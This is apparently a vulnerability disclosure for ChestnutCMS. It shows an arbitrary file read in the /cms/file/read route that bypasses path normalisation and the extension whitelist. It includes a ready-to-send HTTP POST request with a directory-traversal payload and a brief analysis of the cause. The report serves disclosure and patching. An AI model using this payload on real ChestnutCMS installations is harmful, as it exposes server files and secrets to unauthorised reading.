Vendor of Product

https://github.com/liweiyi/ChestnutCMS

https://gitee.com/liweiyi/ChestnutCMS

Chestnutcms has an arbitrary file read vulnerability. The /cms/file/read route can read the filePath path file. There are filtering functions FileExUtils.normalizePath(filePath); and !EDITABLE_FILE_TYPE.contains(FileExUtils.getExtension(path)) to determine whether the directory is traversed and whether the file type suffix is in the whitelist. NormalizePath can be bypassed by...../. !EDITABLE_FILE_TYPE.contains(FileExUtils.getExtension(path)) can use the folder creation function to first create a "1.txt?" directory and then use "1.txt?/...../[file]" to achieve arbitrary file read.

Vulnerability recurrence

First add the "1.txt?" directory

image.png

Then you can use the "cms/file/read" route to read any file

image.png

image.png

image.png

POST /dev-api/cms/file/read HTTP/1.1
Host: 127.0.0.1:1024
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Referer: <http://10.11.35.176:1024/admin/index>
Cookie: Authorization=1c2e571e-fadb-4e6c-aceb-92464899f3b7; Admin-Token=1c2e571e-fadb-4e6c-aceb-92464899f3b7
Accept-Language: zh-CN
Authorization: Bearer 47f03970-5de4-4b2a-8856-40a13a045942
Accept: application/json, text/plain, */*
Content-Type: application/json

{
    "filePath": "test1122/1.txt?/...../...../...../shell.jsp"
}

Vulnerability cause analysis

The "FileExUtils.getExtension" function used in the "FileServiceImpl.java#readFile" function of file reading can be bypassed by using "1.txt?”.

image.png